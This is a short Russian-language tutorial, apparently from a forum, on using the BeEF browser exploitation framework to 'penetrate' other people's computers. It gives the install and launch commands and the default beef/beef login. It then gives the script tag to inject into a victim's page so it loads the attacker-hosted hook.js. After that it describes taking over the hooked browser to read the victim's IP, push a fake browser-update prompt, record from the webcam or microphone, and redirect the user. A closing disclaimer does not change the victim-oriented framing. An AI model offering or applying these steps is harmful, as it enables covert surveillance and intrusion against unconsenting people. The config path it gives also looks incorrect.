BeFF пожалуй самая хорошая программа для проникновения на ПК через локальную сеть !Установка BeEF: (в Kali Linux установка не требуется) sudo apt-get install beef-xss Запускать его тоже достаточно легко: sudo beef-xss Он покажет вам адрес, где находится hook.js и где находится интерфейс (по умолчанию localhost:3000/ui) Переходим в web-интерфейс и вводим логин и пароль По умолчанию: beef/beef Далее вам надо внедрить в какую-либо страницу жертвы данный скрипт, который был указан при запуске: <script src="[место, где находится hook.js]"></script> А дальше уже можно тестировать, проникать и делать разные плюхи по отношению к жертве. К счастью или к сожалению, их слишком много, чтобы рассказать в одной статье, но можно и проникнуться по-подробней в некоторые. Вначале, когда мы хукнули жертву (можно и самого себя, на стартовой странице есть ссылка для этого) у нас слева появляется IP жертвы. Нажимаем на него. Далее у нас откроется окно, но нам надо выбрать во вкладках Commands. * Если хотите узнать ip испытуемого, нам следует открыть папку host, а в ней выбрать Get Internal IP Далее нажимаем запуск (справа внизу) и посередине у нас появляется пунктик, где написана дата и номер команды. Нажимаем и видим IP жертвы. Так же можно в Социальной Инженерии использовать некоторые эксплоиты, такие как clippy (предлагает юзеру обновить браузер). Можно также подключиться к вебке или к микрофону и сделать запись, можно перенаправить юзера на другой URL. Возможности beef-a просто зашкаливают Конфигурационный файл в Kali располагается в /etc/bin/beef-xss Также можно подключить модули metasploit. Советую ознакомиться с данным ресурсами именно в этом порядке: 1. http://kali.tools/?p=1535 2. http://hackware.ru/?p=784 (+подключение metasploit) Дисклеймер: Информация предоставлена исключительно для ознакомления. Не пытайтесь повторить действия писателей в реальной жизни, это грозит тюрьмой. Ответственность за возможно причинённый вред несёте только ВЫ.
